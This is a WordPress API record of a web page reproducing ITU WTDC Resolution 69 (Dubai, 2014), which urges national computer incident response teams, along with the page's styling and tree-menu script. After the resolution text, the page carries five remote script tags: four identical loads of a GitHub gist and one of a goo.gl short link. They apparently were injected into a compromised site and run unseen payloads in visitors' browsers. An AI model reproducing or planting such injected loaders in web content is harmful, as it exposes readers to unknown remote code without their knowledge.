{"id":1613,"date":"2015-06-30T11:20:29","date_gmt":"2015-06-30T15:20:29","guid":{"rendered":"http:\/\/internetdistinction.com\/wsisimpacts\/?page_id=1613"},"modified":"2015-06-30T11:33:01","modified_gmt":"2015-06-30T15:33:01","slug":"wtdc-2014_69","status":"publish","type":"page","link":"https:\/\/internetdistinction.com\/wsisimpacts\/wsis\/wtdc\/wtdc-2014\/wtdc-2014_69\/","title":{"rendered":"WTDC Resolution 69"},"content":{"rendered":"<p><style type=\"text\/css\">\nbody {}\n\n:link { color: #0000ff; text-decoration:none;}\n:visited { color: #6666ff; text-decoration:none; }\na:active { color: #0000ff; text-decoration:none;}\na:hover {color: #0000ff; text-decoration:underline; }\n\ndiv.basetext {}\n\ndiv.basetop {}\n\nh1 {\n    text-align:center;\n}\n\nspan.h2 {}\n\ndiv.year {}\n\ndiv.form {}\n\nspan.cpt {}\n\nspan.cm {}\n\n.fl {}\n\nul {}\n\nli {}\n\nul li {\n\tlist-style:square;\n\tfont-family:sans-serif;\n\tfont-weight:normal;\n}\n\nli.basic {\n\tlist-style:square;\n\tlist-style-image:none;\n  margin-top:2px;\n  margin-bottom:2px;\n}\n\nspan.links {\n}\n\n\n\n\n.sub { display: none; }\n.subexp {display: block; }\n.sub { display: none; } \n\n.subexp {display: block; } \n\nli.exp {\n  list-style-image:url(\"plus.png\");\n  margin-top:10px;\n  margin-bottom:10px;\n  cursor:pointer;\n}\n\nli.col {\n  list-style-image:url(\"minus.png\");\n  margin-top:10px;\n  margin-bottom:10px;\n  cursor:pointer;\n}\n\nli.exp_active {\n  list-style-image:url(\"plus.png\");\n  margin-top:10px;  \n  margin-bottom:10px;\n  background-color:#eeeeff;\n  cursor:pointer;\n}\n\nli.col_active {\n  list-style-image:url(\"minus.png\");\n  margin-top:10px;\n  margin-bottom:10px;\n  background-color:#eeeeff;\n  cursor:pointer; \/* if not included, bullets are not shown right in moz*\/\n}\n\n\nli.basic_active {\n  list-style:square;\n  list-style-image:none;\n  background-color:#eeeeff;\n  margin-top:2px;\n  margin-bottom:2px;\n}\n\n\/* the 'boxed' and 'attributes' styles are used to display notes and attributes\n*\/\n\n.boxed,.nodecontent {display:inline;}\n.boxed .note-and-attributes {display:none;}\n\n.boxed:hover .note-and-attributes {\n\tposition:fixed; top:2em;right:10px;z-index:3;\n\tdisplay:block;\n\tmin-width:33%;\n\tmax-width:60%;\n\tmax-height:95%;\n\tcolor:black;\n\tbackground:#ffffff;\n\tfont:normal 16px courier, sans-serif;\n\tborder:1px solid black;\n\tpadding:10px;\n}\n\n.note:before {\n\tcontent:\"NOTE: \";\n\tfont-weight:bold;\n}\n\ntable.attributes {\n\tborder-collapse:collapse;\n\tempty-cells:show;\n\tborder:thin black solid;\n}\ntable.attributes td,th {\n\tborder:thin black solid;\n\tpadding-top:2px;\n\tpadding-bottom:2px;\n\tpadding-left:3px;\n\tpadding-right:3px;\n}\ntable.attributes th {\n\ttext-align:center;\n}\ntable.attributes caption {\n\tmargin-top:1em;\n\tfont-style:italic;\n\ttext-align:center;\n}\n\/* Thanks to wolfgangradke, https:\/\/sourceforge.net\/forum\/message.php?msg_id=5991663 *\/\ndiv.nodecontent > p {\n\tmargin-top:0pt;\n\tmargin-bottom:0pt;\n\tdisplay:inline;\n}\n\np + p { \n \tmargin-top: 0.5em !important;\n\tdisplay:block !important;\n}\n\n\/* Thanks to erne100, https:\/\/sourceforge.net\/tracker\/?func=detail&atid=107118&aid=2747128&group_id=7118*\/\ntable {\n\tborder-collapse:collapse;\n\tempty-cells:show;\n\tborder:thin black solid;\n}\ntable td {\n\tborder:thin black solid;\n\tpadding-top:2px;\n\tpadding-bottom:2px;\n\tpadding-left:3px;\n\tpadding-right:3px;\n}\n\n\/* Thanks to erne100, https:\/\/sourceforge.net\/tracker\/?func=detail&atid=107118&aid=2747000&group_id=7118*\/\nol {\n\tmargin-top:1px;\n    margin-bottom:1px;\n\tmargin-left:0px;\n\tpadding-left:3%;\n}\n\nol li {\n\tlist-style:decimal;\n\tfont-family:sans-serif;\n\tfont-weight:normal;\n}\n<\/style><br \/>\n<script type=\"text\/javascript\">\r\n\/* MarkTree JavaScript code\r\n * \r\n * Distributed under the terms of the MIT License.\r\n * See \"LICENCE.MIT\" or http:\/\/www.opensource.org\/licenses\/mit-license.php for details.\r\n *\r\n * Software distributed under the License is distributed on an \"AS IS\" basis,\r\n * WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License\r\n * for the specific language governing rights and limitations under the\r\n * License.\r\n * \r\n * Miika Nurminen, 12.7.2004.\r\n *\/\r\n\r\n\/* cross-browser (tested with ie5, mozilla 1 and opera 5) keypress detection *\/\r\nfunction get_keycode(evt) {\r\n  \/\/ IE\r\n    code = document.layers ? evt.which\r\n           : document.all ? event.keyCode \/\/ event.keyCode!=evt.keyCode!\r\n           : evt.keyCode;\r\n\r\n  if (code==0) \r\n    code=evt.which; \/\/ for NS\r\n  return code;\r\n}\r\n\r\nvar lastnode=null;\r\nvar listnodes = null;\r\nvar list_index=1;\r\nvar lastnodetype=''; \/\/ determines if node is a link, input or text;\r\n\r\n\/\/ up, left, down, right, keypress codes\r\n\/\/ijkl\r\n\/\/var keys = new Array(105,106,107,108);\r\n\/\/num arrows\r\n\/\/var keys = new Array(56,52,50,54);\r\n\/\/wasd\r\n\/\/ var press2 = new Array(119,97,115,100);\r\n var press = new Array(47,45,42,43);\r\n\r\n\/\/ keydown codes\r\n  \/\/  var keys2=new Array(87,65,83,68);\r\n  var keys= new Array(38,37,40,39);\r\n\r\n  \/\/ keyset 1 = keydown, otherwise press\r\nfunction checkup(keyset,n) {\r\n  if (keyset==1) return (n==keys[0]);\r\n  return ((n==press[0]) \/*|| (n==press2[0])*\/)\r\n}\r\n\r\nfunction checkdn(keyset,n) {\r\n  if (keyset==1) return (n==keys[2]);\r\n  return ((n==press[2]) \/*|| (n==press2[2])*\/)\r\n}\r\n\r\nfunction checkl(keyset,n) {\r\n  if (keyset==1) return (n==keys[1]);\r\n  return ((n==press[1]) \/*|| (n==press2[1])*\/)\r\n}\r\n\r\nfunction checkr(keyset,n) {\r\n  if (keyset==1) return (n==keys[3]);\r\n  return ((n==press[3]) \/*|| (n==press2[3])*\/)\r\n}\r\n\r\n\r\n\r\n\r\n\r\nfunction is_exp(n) {\r\n  if (n==null) return false;\r\n  return ((n.className=='exp') || (n.className=='exp_active'));\r\n}\r\n\r\nfunction is_col(n) {\r\n  if (n==null) return false;\r\n  return ((n.className=='col') || (n.className=='col_active'));\r\n}\r\n\r\nfunction is_basic(n) {\r\n  if (n==null) return false;\r\n  return ((n.className=='basic') || (n.className=='basic_active'));\r\n}\r\n\r\n\r\n\r\n\/* returns i>=0 if true *\/\r\nfunction is_active(node) {\r\n  if (node.className==null) return false\r\n  return node.className.indexOf('_active');\r\n}\r\n\r\nfunction toggle_class(node) {\r\n  if ((node==null) || (node.className==null)) return;\r\n  str=node.className;\r\n  result=\"\";\r\n  i = str.indexOf('_active');\r\n  if (i>0)\r\n    result= str.substr(0,i);\r\n  else\r\n    result= str+\"_active\";\r\n  node.className=result; \r\n  return node;\r\n}\r\n\r\nfunction activate(node) {\r\n  node.style.backgroundColor='#eeeeff';\r\n}\r\n\r\nfunction deactivate(node) {\r\n   node.style.backgroundColor='#ffffff';\r\n}\r\n\r\nfunction is_list_node(n) {\r\n  if (n==null) return false;\r\n  if (n.className==null) return false;\r\n  if ( (is_exp(n)) || \r\n       (is_col(n)) ||\r\n       (is_basic(n)) )\r\n   return true; else return false;\r\n}\r\n\r\n\r\nfunction get_href(n) {\r\n  alist=n.attributes;\r\n  if (alist!=null) {\r\n    hr = alist.getNamedItem('href');\r\n    if (hr!=null) return hr.nodeValue;\r\n  }\r\n  if (n.childNodes.length==0) return '';\r\n  for (var i=0; i<n.childNodes.length; i++) {\r\n    s = get_href(n.childNodes[i]);\r\n    if (s!='') return s;\r\n  }\r\n  return '';\r\n}\r\n\r\nfunction get_link(n) {\r\n  if (n==null) return null;\r\n  if (n.style==null) return null;\r\n\r\n \/\/ disabling uncontrolled recursion to prevent error messages on IE\r\n \/\/ when trying to focus to invisible links (readonly mode)\r\n\/\/    alert(n.nodeName+' '+n.className);\r\n  if ((n.nodeName=='UL') && (n.className=='sub')) return null;\r\n\r\n  if (n.nodeName=='A') return n;\r\n  if (n.childNodes.length==0) return null;\r\n  for (var i=0; i<n.childNodes.length; i++) {\r\n    s = get_link(n.childNodes[i]);\r\n    if (s!=null) return s;\r\n  }\r\n  return null;\r\n}\r\n\r\nfunction set_lastnode(n) {\r\n\/*var d = new Date();\r\nvar t_mil = d.getMilliseconds();*\/\r\n\/\/ testattu nopeuksia explorerilla, ei merkitt\u2030vi\u2030 eroja\r\n  if (lastnode==n) return; \r\n\/*  deactivate(lastnode)\r\n  lastnode=n;\r\n  activate(lastnode);*\/\r\n\r\n  if (is_active(lastnode)>=0)\r\n    toggle_class(lastnode);\r\n  lastnode=n;\r\n  if (!(is_active(lastnode)>=0))\r\n    toggle_class(lastnode);\r\n\r\n\r\n\/*var d2 = new Date();\r\nvar t_mil2 = d2.getMilliseconds();\r\n  window.alert(t_mil2-t_mil);*\/\r\n}\r\n\r\nfunction next_list_node() {\r\n  tempIndex = list_index;\r\n  while (tempIndex<listnodes.length-1) {\r\n    tempIndex++;\r\n    var x = listnodes[tempIndex];\r\n    if (is_list_node(x)) {\r\n      list_index=tempIndex;\r\n      return;\r\n    }\r\n  }\r\n}\r\n\r\nfunction prev_list_node() {\r\n  tempIndex = list_index;\r\n  while (tempIndex>0) {\r\n    tempIndex--;\r\n    var x = listnodes[tempIndex];\r\n    if (is_list_node(x)) {\r\n      list_index=tempIndex;\r\n      return;\r\n    }\r\n  }\r\n}\r\n\r\n\r\n\r\nfunction getsub (li) {\r\n  if (li.childNodes.length==0) return null;\r\n  for (var c = 0; c < li.childNodes.length; c++)\r\n    if ( (li.childNodes[c].className == 'sub') || (li.childNodes[c].className == 'subexp') ) \r\n      return li.childNodes[c];\r\n}\r\n\r\nfunction find_listnode_recursive (li) {\r\n  if (is_list_node(li)) return li; \r\n  if (li.childNodes.length==0) return null;\r\n  result=null;\r\n  for (var c = 0; c < li.childNodes.length; c++) {\r\n    result=find_listnode_recursive(li.childNodes[c]);\r\n    if (result!=null) return result;\r\n  }\r\n  return null;\r\n}\r\n\r\nfunction next_child_listnode(li) {\r\n  var result=null;\r\n  for (var i=0; i<li.childNodes.length; i++) {\r\n    result=find_listnode_recursive(li.childNodes[i]);\r\n    if (result!=null) return result;\r\n  }\r\n  return null;  \r\n}\r\n\r\nfunction next_actual_sibling_listnode(li) {\r\n  if (li==null) return null;\r\n  var temp=li;\r\n  while (1) { \r\n    var n = temp.nextSibling;\r\n    if (n==null) {\r\n      n=parent_listnode(temp);\r\n      return next_actual_sibling_listnode(n);\r\n    }\r\n    if (is_list_node(n)) return n;\r\n    temp=n;\r\n  }\r\n}\r\n\r\nfunction next_sibling_listnode(li) {\r\nif (li==null) return null; \r\n var result=null;\r\n  var temp=li;\r\n  if (is_col(temp)) return next_child_listnode(temp);\r\n  while (1) { \r\n    var n = temp.nextSibling;\r\n    if (n==null) {\r\n      n=parent_listnode(temp);\r\n      return next_actual_sibling_listnode(n);\r\n    }\r\n    if (is_list_node(n)) return n;\r\n    temp=n;\r\n  }\r\n}\r\n\r\nfunction last_sibling_listnode(li) {\r\n  if (li==null) return null;\r\n  var temp=li;\r\n  var last=null;\r\n  while(1) {\r\n    var n = temp.nextSibling;\r\n    if (is_list_node(temp)) \r\n      last = temp;\r\n    if (n==null) {\r\n      if (is_col(last)) return last_sibling_listnode(next_child_listnode(last));\r\n      else return last;\r\n    }\r\n    temp = n;\r\n  }\r\n}\r\n\r\nfunction prev_sibling_listnode(li) { \r\n  if (li==null) return null;\r\n  var temp=li;\r\n  var n = null;\r\n  while (1) { \r\n    n = temp.previousSibling;\r\n    if (n==null) {\r\n      return parent_listnode(li);\r\n    }\r\n    if (is_list_node(n)) {\r\n      if (is_col(n)) { \r\n        return last_sibling_listnode(next_child_listnode(n));\r\n      }\r\n      else {\r\n        return n;\r\n      }\r\n    }\r\n    temp=n;\r\n  }\r\n}\r\n\r\n\r\nfunction parent_listnode(li) {\r\n  \/\/ added 12.7.2004 to prevent IE error when readonly mode==true\r\n  if (li==null) return null;\r\n  n=li;\r\n  while (1) {\r\n    n=n.parentNode;\r\n    if (n==null) return null;\r\n    if (is_list_node(n)) return n;\r\n  }\r\n}\r\n\r\nfunction getVisibleParents(id) {\r\n  var n = document.getElementById(id);\r\n  while(1) {\r\n    expand(n);\r\n    n = parent_listnode(n);\r\n    if (n==null) return;\r\n  }\r\n}\r\n\r\nfunction onClickHandler (evt) {\r\nif (lastnode==null) \r\n{\r\nlistnodes = document.getElementsByTagName('li');\r\nlastnode=listnodes[1];\r\ntemp=listnodes[1];\r\n}\r\n\r\n\r\n  var target = evt ? evt.target : event.srcElement;\r\n  if (!is_list_node(target)) return;\r\n  toggle(target);\r\n  set_lastnode(target);\r\n}\r\n\r\n\r\nfunction expand(node) {\r\n    if (!is_exp(node)) return;\r\n    if (node.className=='exp_active') \r\n      node.className='col_active';\r\n    else \r\n        node.className='col';\r\n    setSubClass(node,'subexp');\r\n    \/\/    getsub(node).className='subexp';\r\n}\r\n\r\nfunction collapse(node) {\r\n  if (!is_col(node)) return;\r\n  \r\nif (node.className=='col_active')\r\n    node.className='exp_active'\r\n  else \r\n    node.className='exp';\r\n\r\n setSubClass(node,'sub');\r\n\/\/  getsub(node).className='sub';\r\n\r\n}\r\n\r\nfunction setSubClass(node,name) {\r\n  sub = getsub(node);\r\n  if (sub==null) return;\r\n  sub.className=name;  \r\n}\r\n\r\nfunction toggle(target) {\r\n  if (!is_list_node(target)) return;\r\n    if (is_col(target)) {\r\n      target.className='exp';\r\n      setSubClass(target,'sub');\r\n      \/\/      getsub(target).className='sub';\r\n    }\r\n    else if (is_exp(target)) {\r\n      target.className='col';\r\n      setSubClass(target,'subexp');\r\n      \/\/      getsub(target).className='subexp';\r\n    }\r\n \r\n}\r\n\r\nfunction expandAll(node) {\r\n    if (node.className=='exp') {\r\n        node.className='col';\r\n        setSubClass(node,'subexp');\r\n\/\/        getsub(node).className='subexp';\r\n    }\r\n    var i;\r\n    if (node.childNodes!=null) \r\n\/\/    if (node.hasChildNodes()) \r\n        for ( i = 0; i<node.childNodes.length; i++)\r\n            expandAll(node.childNodes[i]);\r\n}\r\n\r\nfunction collapseAll(node) {\r\n    if  (node.className=='col') {\r\n        node.className='exp';\r\n        setSubClass(node,'sub');\r\n\/\/        getsub(node).className='sub';\r\n    }\r\n    var i;        \r\n    if (node.childNodes!=null) \r\n\/\/ for opera   if (node.hasChildNodes()) \r\n        for ( i = 0; i<node.childNodes.length; i++)\r\n            collapseAll(node.childNodes[i]);\r\n}\r\n\r\n\r\n\r\nfunction unFocus(node) {\r\n     \/\/ unfocuses potential link that is to be hidden (if a==null there is no link so it should not be blurred).\r\n     \/\/ tested with mozilla 1.7, 12.7.2004. \/mn (\r\n      intemp=parent_listnode(node);  \r\n      a = get_link(intemp);     \/\/ added 6.4. to get keyboard working with\r\n      \/\/ moved before collapse to prevent an error message with IE when readonly==true      \r\n      if (a!=null) a.blur(); \/\/ netscape after collapsing a focused node\r\n      return intemp;\r\n}\r\n\r\n\/\/ mode: 0==keypress, 1==keyup\r\nfunction keyfunc(evt,mode) {\r\n var c = get_keycode(evt);\r\n var temp = null;\r\n var a = null;\r\n\r\n  if (lastnode==null) {\r\n    listnodes = document.getElementsByTagName('li');\r\n    lastnode=listnodes[1];\r\n    temp=listnodes[1];\r\n  }\r\n\r\n  \/\/window.alert(c);\r\n  if (checkup(mode,c)) { \/\/ i \r\n   temp=prev_sibling_listnode(lastnode);\r\n  }\r\n  else if (checkdn(mode,c)) { \/\/ k\r\n    temp=next_sibling_listnode(lastnode);\r\n  }\r\n  else if (checkr(mode,c)) { \/\/ l\r\n    expand(lastnode);\r\n    \/\/  temp=next_child_listnode(lastnode);\r\n    \/\/ if (temp==null) {\r\n      a = get_link(lastnode);\r\n        if (a!=null) a.focus(); else self.focus(); \r\n      \/\/}\r\n  }\r\n  else if (checkl(mode,c)) { \/\/ j\r\n    if (is_col(lastnode)) {\r\n      unFocus(lastnode);\r\n      collapse(lastnode);\r\n    }\r\n    else {\r\n      temp=unFocus(lastnode);\r\n      collapse(temp);\r\n    }\r\n   \/\/    if (temp==null) lastnode.focus(); \/\/ forces focus to correct div (try mozilla typesearch) (doesn't seem to work -mn\/6.4.2004)\r\n  }\r\n  else return;\r\n  if (temp!=null) set_lastnode(temp);\r\n\r\n  \/\/ alert('pressed ' + String.fromCharCode(c) + '(' + c + ')');\r\n  return true;\r\n}\r\n\r\n\r\nfunction keytest (evt) {\r\n  return keyfunc(evt,1);\r\n};\r\n\r\n\r\nfunction presstest (evt) {\r\n  return keyfunc(evt,0);\r\n};\r\n\r\n\r\n  document.onclick = onClickHandler;\r\n  document.onkeypress = presstest;\r\n  document.onkeyup = keytest;\r\n<\/script><\/p>\n<h3><span style=\"\">WTDC RESOLUTION 69 (Rev. Dubai, 2014)<\/span><\/h3>\n<h4><span style=\"\">Facilitating creation of national computer incident response teams, particularly for developing countries, and cooperation between them<\/span><\/h4>\n<p><span style=\"\">The World Telecommunication Development Conference (Dubai, 2014),<\/span><\/p>\n<ul class=\"subexp\">\n<li class=\"exp\">\n<div class=\"nodecontent\">recalling<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">a)Resolutions 101, 102, and 130 (Rev. Guadalajara, 2010) of the Plenipotentiary Conference, which stress the need for collaboration;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">b) Resolution 69 (Rev. Hyderabad, 2010) of the World Telecommunication Development Conference (WTDC), and the need to improve coordination and capacity to respond to cybersecurity challenges,<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">recognizing<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">a) the highly satisfactory results obtained by the regional approach adopted within the framework of Resolution 69 (Rev. Hyderabad, 2010);<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">b) the increasing level of computer use and computer dependency in information and communication technologies (ICT) in developing countries;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">c)the exposure of developing countries to attacks and threats targeting ICT networks through computers, and that they could be better prepared for such attacks and threats and the increasing level of fraudulent activity by these means;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">d) the results of the work to date on Question 22\u20111\/1 by Study Group 1 of the ITU Telecommunication Development Sector (ITU\u2011D) and its reports and coursework on this subject, which include support for the creation of computer incident response teams (CIRTs) and establishing public\/private partnerships;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">e)the work to date of BDT Programme 2, to bring together Member States and other stakeholders to assist countries in building national incident management capabilities, such as CIRTs;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">f)the importance of having an appropriate level of computer emergency preparedness in all countries, particularly developing countries, by establishing CIRTs on a national basis, and the importance of coordination within and among the regions and of taking advantage of regional and international initiatives in this regard, including the ITU cooperation with regional and global projects and organizations, such as IMPACT, FIRST, the Organization of American States (OAS) and the Asia-Pacific Computer Emergency Response Team (APCERT), among others,<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">noting<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">a) that there is an improved, but still low level of computer emergency preparedness within developing countries;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">b) that the high level of interconnectivity of telecommunication\/ICT networks could be affected by the launch of an attack from networks of the less-prepared nations, which are mostly the developing countries;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">c)the importance of having an appropriate level of computer emergency preparedness in all countries;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">d)the work of Study Group 17 of the ITU Telecommunication Standardization Sector (ITU\u2011T) in the area of national CIRTs, particularly for developing countries, and cooperation between them, as contained in the outputs of that study group;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">e) the need for the establishment of CIRTs on a national basis, including CIRTs responsible for government-to-government cooperation, and the importance of coordination among all relevant organizations;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">f) the ITU Global Cybersecurity Agenda,<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">resolves<\/div>\n<ul class=\"sub\">\n<li class=\"exp\">\n<div class=\"nodecontent\">1 to invite Member States and Sector Members with experience in this area:<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">\u2022 to establish national CIRTs, including CIRTs responsible for government-to-government cooperation, where needed or currently lacking;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">\u2022 to collaborate closely with relevant organizations, and ITU\u2011T, in this regard, taking into consideration Resolution 58 (Rev. Dubai, 2012) of the World Telecommunication Standardization Assembly;<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"col\">\n<div class=\"nodecontent\">2 to instruct the Director of the Telecommunication Development Bureau to give the necessary priority to this, by:<\/div>\n<ul class=\"subexp\">\n<li class=\"basic\">\n<div class=\"nodecontent\">\u2022 promoting national regional and international best practices for establishing CIRTs, as identified by the relevant ITU study groups, such as ITU\u2011D Study Group 1 Question 22\u20111\/1 to date and by other relevant organizations and experts;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">\u2022 preparing the training programmes necessary for this purpose and continuing to provide support as required to those developing countries that so wish;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">\u2022 promoting collaboration between and among national CIRTs, including CIRTs responsible for government-to-government cooperation, industry CIRTs and academia CIRTs, in accordance with national legislation, at the regional and global level, by encouraging the participation of developing countries in regional and global projects and in the work of organizations, such as IMPACT, FIRST, OAS and APCERT, among others;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">\u2022 working to achieve these goals while avoiding duplication of effort with other organizations;<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">3 to instruct Question 3\/2 of ITU-D Study Group 2, within its mandate, to contribute to the implementation of this resolution, also taking into consideration the work carried out by ITU\u2011T on this issue.<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/goo.gl\/dd1kPI'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>WTDC RESOLUTION 69 (Rev. Dubai, 2014) Facilitating creation of national computer incident response teams, particularly for developing countries, and cooperation between them The World Telecommunication Development Conference (Dubai, 2014), recalling a)Resolutions 101, 102, and 130 (Rev. Guadalajara, 2010) of the Plenipotentiary Conference, which stress the need for collaboration; b) Resolution 69 (Rev. Hyderabad, 2010) of [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":1580,"menu_order":69,"comment_status":"open","ping_status":"open","template":"","meta":{"footnotes":""},"class_list":["post-1613","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages\/1613","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/comments?post=1613"}],"version-history":[{"count":0,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages\/1613\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages\/1580"}],"wp:attachment":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/media?parent=1613"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}